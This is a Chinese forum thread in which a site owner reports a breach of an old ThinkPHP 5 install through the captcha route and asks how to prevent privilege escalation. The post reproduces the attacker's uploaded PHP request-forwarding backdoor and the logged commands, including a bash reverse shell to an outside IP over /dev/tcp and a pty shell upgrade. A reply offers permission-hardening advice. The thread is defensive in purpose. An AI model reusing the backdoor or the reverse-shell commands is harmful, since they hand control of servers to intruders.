最近被入侵了，各位看看有没有什么好访问，入侵过程

cyr11

由于用了老版本thinkphp被入侵了，然后上传了php文件，现在问题如果只是入侵一个站也就算了，目前入侵后竟然可以拿到服务器权限，
代码如下

1. <?php
   
2. function get_client_header(){
   
3.     $headers=array();
   
4.     foreach($_SERVER as $k=>$v){
   
5.         if(strpos($k,'HTTP_')===0){
   
6.             $k=strtolower(preg_replace('/^HTTP/', '', $k));
   
7.             $k=preg_replace_callback('/_\w/','header_callback',$k);
   
8.             $k=preg_replace('/^_/','',$k);
   
9.             $k=str_replace('_','-',$k);
   
10.             if($k=='Host') continue;
    
11.             $headers[]="$k:$v";
    
12.         }
    
13.     }
    
14.     return $headers;
    
15. }
    
16. function header_callback($str){
    
17.     return strtoupper($str[0]);
    
18. }
    
19. function parseHeader($sResponse){
    
20.     list($headerstr,$sResponse)=explode("
    
21. 
    
22. 
    
23. 
    
24. ",$sResponse, 2);
    
25.     $ret=array($headerstr,$sResponse);
    
26.     if(preg_match('/^HTTP/1.1 d{3}/', $sResponse)){
    
27.         $ret=parseHeader($sResponse);
    
28.     }
    
29.     return $ret;
    
30. }
    
31. 
    
32. set_time_limit(120);
    
33. $headers=get_client_header();
    
34. $host = "127.0.0.1";
    
35. $port = 62235;
    
36. $errno = '';
    
37. $errstr = '';
    
38. $timeout = 30;
    
39. $url = "/1.php";
    
40. 
    
41. if (!empty($_SERVER['QUERY_STRING'])){
    
42.     $url .= "?".$_SERVER['QUERY_STRING'];
    
43. };
    
44. 
    
45. $fp = fsockopen($host, $port, $errno, $errstr, $timeout);
    
46. if(!$fp){
    
47.     return false;
    
48. }
    
49. 
    
50. $method = "GET";
    
51. $post_data = "";
    
52. if($_SERVER['REQUEST_METHOD']=='POST') {
    
53.     $method = "POST";
    
54.     $post_data = file_get_contents('php://input');
    
55. }
    
56. 
    
57. $out = $method." ".$url." HTTP/1.1\r\n";
    
58. $out .= "Host: ".$host.":".$port."\r\n";
    
59. if (!empty($_SERVER['CONTENT_TYPE'])) {
    
60.     $out .= "Content-Type: ".$_SERVER['CONTENT_TYPE']."\r\n";
    
61. }
    
62. $out .= "Content-length:".strlen($post_data)."\r\n";
    
63. 
    
64. $out .= implode("\r\n",$headers);
    
65. $out .= "\r\n\r\n";
    
66. $out .= "".$post_data;
    
67. 
    
68. fputs($fp, $out);
    
69. 
    
70. $response = '';
    
71. while($row=fread($fp, 4096)){
    
72.     $response .= $row;
    
73. }
    
74. fclose($fp);
    
75. $pos = strpos($response, "\r\n\r\n");
    
76. $response = substr($response, $pos+4);
    
77. echo $response;
    

复制代码

然后上传了一个so后缀文件这个就不上传了，提权用的，
运行命令如下

1. /bin/sh -c cd /data/114/sp/public;bash -i >& /dev/tcp/47.104.86.101/39553 0>&1;echo 8087a12ec;pwd;echo 5cd09d5a4e86
   
2. bash -i
   
3. python -c import pty;pty.spawn('/bin/bash')
   
4. /bin/bash
   
5. /bin/sh
   
6. su -
   
7. -bash

复制代码

如果学习可自行百度命令意思

目前怎么防止入侵后网站后提权获取到服务器权限，高手指点一下谢谢
特别说明网站限制.user.ini是没有用的
人家直接提权获取服务器权限

cyr11

网站入侵的是thinkphp5的漏洞_index.php?s=captcha

cyr11

目前测试一下他的木马，user.ini也限制不了目录，可以随意上传文件到任何目录，这php被入侵了，真是把服务器给别人了，好不安全

wuuyun

cyr11 发表于 2024-8-30 18:24
目前测试一下他的木马，user.ini也限制不了目录，可以随意上传文件到任何目录，这php被入侵了，真是把服务 ...

都提权了确实没啥办法
目前权限限定死 ，可写目录 禁止可执行，可执行的目录设置 禁止写入
再就是 安装防护软件啥的
健壮代码检测